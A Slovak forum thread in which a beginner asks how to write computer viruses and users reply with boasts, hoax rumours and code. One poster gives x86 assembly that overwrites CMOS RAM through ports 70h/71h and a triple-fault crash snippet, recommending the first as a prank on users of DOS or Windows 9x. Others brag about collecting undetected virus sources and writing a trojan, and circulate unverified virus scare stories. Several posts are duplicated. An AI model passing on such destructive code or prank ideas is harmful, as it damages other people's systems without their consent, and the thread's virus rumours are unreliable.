Programovanie virusov
Programovanie virusov
Neviem presne ci to patri sem, ale chcem sa opytat ci vie niekto programovat virusi. Potom v akom programe je to robene.
-
audiotrack
VIP
- Kontaktovať používateľa:
-
caesar1987
Addict
JagW kebyze si skusenejsi, tak by osm ti asi aj dal zdrojaky virusov - mam ich cca 2000
a mam aj plno takych,ktore ti nenajde este ziadny antivir, najkolko zbieram virusy, ale takto radsej nie, bo by to bola pre teba asi vrazda systemu...
alebo vies co, dam ti sem napr jeden
a mam aj plno takych,ktore ti nenajde este ziadny antivir, najkolko zbieram virusy, ale takto radsej nie, bo by to bola pre teba asi vrazda systemu...
Kód: Vybrať všetko
//zdroják zmazaný
Ale ako sa mam stat skusenejsim, ked neviem s toho nic. Kde to napisem ten tvoj zdrojak? Ako to ulozim? Nemas na zaciatok nieco jednoduchsie?caesar1987 napísal:JagW kebyze si skusenejsi, tak by osm ti asi aj dal zdrojaky virusov - mam ich cca 2000
...
-
caesar1987
Addict
heh, sa vidím v 16 rokoch.. až na to, že ja som sa tak sproste nepýtal na fórach.. základom je samostatné myslenie (dúfam nezaložíš ďalšiu tému, kde ho budeš zháňať).. človek aj tak skončí pri kreatívno-pozitívnej práci.. či už strachom, alebo vyspelosťou.. tak ani nestrácaj čas nad takými blbosťami...
-
audiotrack
VIP
-
hacker z vychod
Novice
jj
Programovanie vírusov nieje tložité.Treba sa len trocha viac vyznať v jednotlivých jazykoch v ktorých páíšete a vedieť využívať správne rôzne príkazy.Na pr. v C++ je dosť jednoduchý program na prenos súborov.Stačí malá zmena v príkaze a jednoduchý dodatok(aby vytvoril čo najviac svojich kópií) a máte jednoduchého červa ktorý žere na pr. exe súbory.
//autoeditácia príspevku ( 05 Jul 2008, 18:34 )
Samozrejme zložitejšie vírusy sú omnoho ťažšie programovateľné. Na internete sa objavil nový vírus, ktorý spáli harddisk.Na internete už koluje varovný mail.Windowsom a esetom je považovaný za zatiaľ najničivejší vírus sveta.
//autoeditácia príspevku ( 05 Jul 2008, 18:34 )
Samozrejme zložitejšie vírusy sú omnoho ťažšie programovateľné. Na internete sa objavil nový vírus, ktorý spáli harddisk.Na internete už koluje varovný mail.Windowsom a esetom je považovaný za zatiaľ najničivejší vírus sveta.
jeden virus viem "z hlavy" 
lidt [0]
int 0
toto ked spustite pod MS-DOSom tak sa vam system zruti (triple fault) - na DOSe sa rovno resetuje
toto pouzivam ako funkciu pre restartovanie mojho OS
a "virus" co funguje aj pod Windows 9x:
toto dosere kontrolny sucet CMOSky - to iste ako keby ste vybrali CMOS bateriu z PC na chvilku, dali naspat a zapli PC 
pre OS beziace na NT jadre (alias WinNT/2000/XP/Vista) toto asi nepojde, kedze NT jadro ma emulaciu DOSu (9xka bezala presne pod DOSom) a navyse ta emulacia blokuje priamy pristup ku portom (napr. pod windows nt alebo XP nie je mozne ze pod nejakou DOS hrou sprevadzkujete vas stary sound blaster co ste nasli v pivnici
)
tento kod je sranda dat tomu, kto este pouziva DOS, Windows 3.1, 95 alebo 98: uvidite ako ten dotycny bude nasraty ze kazdy boot systemu bude musiet nahadzovat novy cas do CMOS RAM
SPÁLI HARDDISK?
HOAX, vymysel, fama
taketo kraviny ze "pozor nebezpecny virus" co vam kamaradi rozoslu tak pamatajte: totalne voloviny (cest vynimkam, co je jedno percento z takychto emailov)
a ked chcete spalit harddisk: zastrcte molex konektor opacnou stranou nasilim (kladivom) a zapnite PC
plosak HDD vam odhori.. aj ked data vam ostanu, staci len plosak vymenit (co vsak je velmi drahe a ludia toto robia len ak su tam dolezite data)
ale to uz su detaily
lidt [0]
int 0
toto ked spustite pod MS-DOSom tak sa vam system zruti (triple fault) - na DOSe sa rovno resetuje
toto pouzivam ako funkciu pre restartovanie mojho OS
a "virus" co funguje aj pod Windows 9x:
push cx
push ax
xor ax,ax
mov al,2eh
out 70h,al
xor al,al
out 71h,al
xor cx,cx
mov cl,3Fh
.l1:
mov al,cl
out 70h,al
jmp .l2
.l2:
out 71h,al
loop .l1
pop ax
pop cxpre OS beziace na NT jadre (alias WinNT/2000/XP/Vista) toto asi nepojde, kedze NT jadro ma emulaciu DOSu (9xka bezala presne pod DOSom) a navyse ta emulacia blokuje priamy pristup ku portom (napr. pod windows nt alebo XP nie je mozne ze pod nejakou DOS hrou sprevadzkujete vas stary sound blaster co ste nasli v pivnici
tento kod je sranda dat tomu, kto este pouziva DOS, Windows 3.1, 95 alebo 98: uvidite ako ten dotycny bude nasraty ze kazdy boot systemu bude musiet nahadzovat novy cas do CMOS RAM
/edit:Samozrejme zložitejšie vírusy sú omnoho ťažšie programovateľné. Na internete sa objavil nový vírus, ktorý spáli harddisk.Na internete už koluje varovný mail.Windowsom a esetom je považovaný za zatiaľ najničivejší vírus sveta.
SPÁLI HARDDISK?
a ked chcete spalit harddisk: zastrcte molex konektor opacnou stranou nasilim (kladivom) a zapnite PC
ale to uz su detaily
-
hacker z vychod
Novice
ten virus existuje.A teraz som sa docital o nejakom viruse ktory ti zacne mazat subory.Pride ti e mail, v ktorom od teba chcu peniaze za odvirovanie.Na slovensku ten virus zatial nieje ale v cesku ho maju uz asi 4 pocitace.Taky maly cervik:)
A s tym helo worldom mas pravdu.Mladi by sa mali najprv ucit zaklady programovania a princip na korom vobec tie programy pracuju, system chapania programov a nie len "otvorit hlavu a cakat, ze ti tam naleju vedomosti ktore si musela kopa ludi odmakat"
//autoeditácia príspevku ( 06 Jul 2008, 13:17 )
v zivote som nevidel, ze by dakto chcel navod na programovanie virusov.Kazdy virus je niecim iny, aj ked pracuju na tom istom principe, nikdy by sa dakemu hlupakovi nepodarilo ani len prerobit nejaky vidus. Aj daky sprosty nuker by ho stal celorocnu pracu.Ja som napisal jeden dost srandovny trojan.Spustis ho a on ti zacne stale dokola spustat windows.Neviem, ci uz taky virus neexistuje, ale je to sranda ked je zrazu pretazenie na 100% a daky chlapik len cumi co sa to deje.Aky programovaci jazyk povazujete za najvhodnejsi pre pisanie virusov??
A s tym helo worldom mas pravdu.Mladi by sa mali najprv ucit zaklady programovania a princip na korom vobec tie programy pracuju, system chapania programov a nie len "otvorit hlavu a cakat, ze ti tam naleju vedomosti ktore si musela kopa ludi odmakat"
//autoeditácia príspevku ( 06 Jul 2008, 13:17 )